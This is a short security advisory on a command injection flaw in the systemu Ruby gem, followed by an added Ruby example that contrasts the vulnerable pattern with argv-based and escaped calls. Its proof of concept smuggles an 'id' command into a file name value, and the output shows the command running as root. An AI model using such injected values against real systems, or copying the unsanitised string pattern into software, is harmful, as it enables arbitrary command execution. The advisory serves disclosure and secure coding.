Systemu 2.5.2 Ruby Gem Command Injection

Larry W. Cashdollar 7/22/2013 @_larry0

The systemu Ruby Gem doesn't sanitize input before shelling out. Depending on the context, if other gems use it to execute commands (for example,
running ImageMagick to process an image file) and they aren't sanitizing input themselves, you can inject commands remotely.

The Gem can be downloaded here:

https://rubygems.org/gems/systemu


PoC
irb(main):038:0> userfile = '/tmp/test;id;'
=> "/tmp/test;id;"
irb(main):039:0> cmd2 = %q(file) +" "+ userfile
=> "file /tmp/test;id;"
irb(main):040:0> status = systemu cmd2
=> [#, "/tmp/test: ASCII text\nuid=0(root) gid=0(root) groups=0(root)\n", ""]
irb(main):041:0>
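
Added example, not part of the original advisory and not systemu's own code: the string-concatenation pattern from the PoC next to two safer call styles. It assumes Ruby's standard Open3 in place of systemu, echo standing in for file so it runs anywhere, and a constructed input whose injected command is a harmless echo.

```ruby
require 'open3'
require 'shellwords'

# Constructed input with the same shape as the PoC's userfile value;
# a harmless echo marks whether the injected command ran.
USERFILE = '/tmp/test;echo INJECTED;'

# Vulnerable pattern from the PoC: command and input joined into one string.
# Ruby passes a string containing shell metacharacters to /bin/sh -c.
def run_as_string(tool, userfile)
  out, _status = Open3.capture2e(tool + ' ' + userfile)
  out
end

# Hardened: separate argv elements, so no shell parses the input.
# For tools that take options, also pass '--' before the file name.
def run_as_argv(tool, userfile)
  out, _status = Open3.capture2e(tool, userfile)
  out
end

# Fallback when an API only accepts one command string: quote the input.
def run_escaped(tool, userfile)
  out, _status = Open3.capture2e(tool + ' ' + Shellwords.escape(userfile))
  out
end

if __FILE__ == $PROGRAM_NAME
  puts run_as_string('echo', USERFILE).inspect
  puts run_as_argv('echo', USERFILE).inspect
  puts run_escaped('echo', USERFILE).inspect
end
```

Only the first call runs the second command; the other two treat the whole value as a single file name argument.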